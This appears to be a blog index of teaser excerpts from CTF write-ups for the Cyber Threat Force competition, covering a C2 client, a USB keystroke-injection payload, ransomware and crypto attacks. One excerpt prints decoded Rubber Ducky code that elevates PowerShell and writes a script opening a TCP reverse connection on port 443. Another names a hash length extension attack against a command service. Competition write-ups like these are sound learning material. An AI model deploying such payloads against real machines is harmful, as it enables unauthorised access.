Cyber Threat Force (CTF)

This was a short CTF (48h), a format that I like since it doesn’t eat up too much of my time. I enjoyed it with my friends: Lukho, R0ck3t and Volker. We registered a team on CTFTime: Root Root. We ranked 4th out of 197 teams, scoring 6935 points. And I personnaly ranked 6th, scoring 3775 points and completing 19 challenges! Here are the challenges that I completed or spent time on, with links to my writeups:
Read more →

Writeup Cyber Threat Force : Azkaban C2

For this challenge, we were given a python script: import socket def menu(): print("______________________") print("| MENU |") print("| 1) see option |") print("| 2) edit option |") print("| 3) connect |") print("______________________") print(""" ______ __ __ ______ / \ / | / | / \ /$$$$$$ | ________ $$ | __ ______ $$ |____ ______ _______ _______ /$$$$$$ | $$ |__$$ |/ |$$ | / | / \ $$ \ / \ / \ / |$$____$$ | $$ $$ |$$$$$$$$/ $$ |_/$$/ $$$$$$ |$$$$$$$ | $$$$$$ |$$$$$$$ | /$$$$$$$/ / $$/ $$$$$$$$ | / $$/ $$ $$< / $$ |$$ | $$ | / $$ |$$ | $$ | $$ | /$$$$$$/ $$ | $$ | /$$$$/__ $$$$$$ \ /$$$$$$$ |$$ |__$$ |/$$$$$$$ |$$ | $$ | $$ \_____ $$ |_____ $$ | $$ |/$$ |$$ | $$ |$$ $$ |$$ $$/ $$ $$ |$$ | $$ | $$ |$$ | $$/ $$/ $$$$$$$$/ $$/ $$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ $$/ $$/ $$$$$$$/ $$$$$$$$/ -----=[Azkaban C2 v.
Read more →

Writeup Cyber Threat Force : Like a duck in water

Note: I did not solve this challenge during the CTF, but my teammate Lukho did. For this challenge, we were given an inject.bin file, which contains an encoded Rubber Ducky payload. We can use the Duck Toolkit to get back the original code: DELAY DELAY powershell Start-Process notepad -Verb runAsENTER DELAY DELAY ENTER DELAY mDELAY DOWNARROW ... DOWNARROW ENTER $folderDateTime = (get-date).ToString('d-M-y HHmmss')ENTER ... Add-Content "$env:TEMP\72794.ps1" '$c = New-Object System.Net.Sockets.TCPClient("CYBERTF{D0N4LD_DUC|<}",443);$s = $c.
Read more →

Writeup Cyber Threat Force : Usb key cemetery

Note: I did not solve this challenge during the CTF, but my teammate Volker did. For this challenge, we were given a zip containing an encoded syslog (sysloc.enc), and an auth.json file: { "manufact": [ "Apple Inc.", "Azurewave", "Generic", "Linux 5.10.0-kali8-amd64 xhci-hcd", "usbrip-4381" ], "pid": [ "0002", "0003", "0129", "0608", "12a8", "3491", "56dd", "usbrip-4381" ], "prod": [ "USB2.0 HD UVC WebCam", "USB2.0 Hub", "USB2.0-CRW", "iPhone", "usbrip-4381", "xHCI Host Controller" ], "serial": [ "0000:03:00.
Read more →

Writeup Cyber Threat Force : Trojan tools

For this challenge, we were given a TROJAN_TOOLS.exe file. Before manually analyzing it, I tried feeding it to hybrid analysis. Here is the link to the full report. The “Interesting strings” section contained the flag: CYBERTF{Y0u_H4s_P3wn_Th3_H4ck_T0ol}. We can also try to solve the challenge in a more conventional way. Executing the application gives us: C:\Users\IEUser\Desktop>original.exe Please enter the good PIN Using a process monitor We can use procmon from the Sysinternals suite to monitor the process.
Read more →

Writeup Cyber Threat Force : Viking crypt

For this challenge, we were given a ransomware (VIKING_CRYPT.exe and VIKING_DECRYPT.exe) along with a LOCKER.HTML file and IMPORTANT_NOTE.txt.vkg. Let’s take a look at that encrypted note: $ file Perso/IMPORTANT_NOTE.txt.vkg Perso/IMPORTANT_NOTE.txt.vkg: ASCII text, with no line terminators $ cat Perso/IMPORTANT_NOTE.txt.vkg 8a9b600b5a745d39cb7c7e7890e816848a9fe77280b42ca0751d150bb849 It doesn’t really look like any encryption I know. We can try to run VIKING_DECRYPT.exe: As expected, we’re asked for a decryption key. Let’s encrypt a few files in a VM, and compare the plaintext and the .
Read more →

Writeup Cyber Threat Force : (Un)Efficient encryption

For this challenge, we were given two pcapng files, comm1.pcapng and comm2.pcapng, and a text file. The text file contains this: Bonjour Agent-CTF, Nous avons recemment interceptés un message, chiffré grace a un algorithme inconnu. Nous avons mis en relation ce message a un message anterieur, contenant une discussion suspecte entre deux membres de l’APT. Votre mission sera de dechiffrer les communications. Bonne chance Q.G. We can use tshark to view the raw data of the network captures:
Read more →

Writeup Cyber Threat Force : The document is strange

For this challenge, we were given a CV.doc document. Opening it reveals a pretty normal looking resume template, and a warning about macros from LibreOffice.

Using the macros menu, we can dump their code:

Read more →

Writeup Cyber Threat Force : Strange service

For this challenge, we were given access to a service. The description told us that it was an encryption oracle, which used AES to encrypt what we sent it, concatenated with critical data. I’m writting this after the challenge ended, so I can’t include demos. The description should make us think about byte-at-a-time ECB decryption attacks, which are well explained here: Cryptopals - Byte-a-time ECB decryption (Simple) Why is Byte-at-a-time ECB decryption a vulnerability?
Read more →

Writeup Cyber Threat Force : Strange administration service

For this challenge, we were given access to a server which we can connect to: $ nc 144.217.73.235 27099 give me cmd|token example: ls|c9af5ac08978481063b711f031f38518a7c2d83d6db3eabacbd7726470e8a140 id|69a4061766769d0a19ab59e6f905f7ac5875691b62765cb6b3b5ee6ae08f776a ls|c9af5ac08978481063b711f031f38518a7c2d83d6db3eabacbd7726470e8a140 chall.py wrapper $ nc 144.217.73.235 27099 give me cmd|token example: ls|c9af5ac08978481063b711f031f38518a7c2d83d6db3eabacbd7726470e8a140 id|69a4061766769d0a19ab59e6f905f7ac5875691b62765cb6b3b5ee6ae08f776a whoami|c9af5ac08978481063b711f031f38518a7c2d83d6db3eabacbd7726470e8a140 Bad Token It executes the command we give it, given that we know the corresponding hash. The challenge description told us that the hash format is HASH(SECRET || CMD). This should instantly make us think of hash key length extension attacks.
Read more →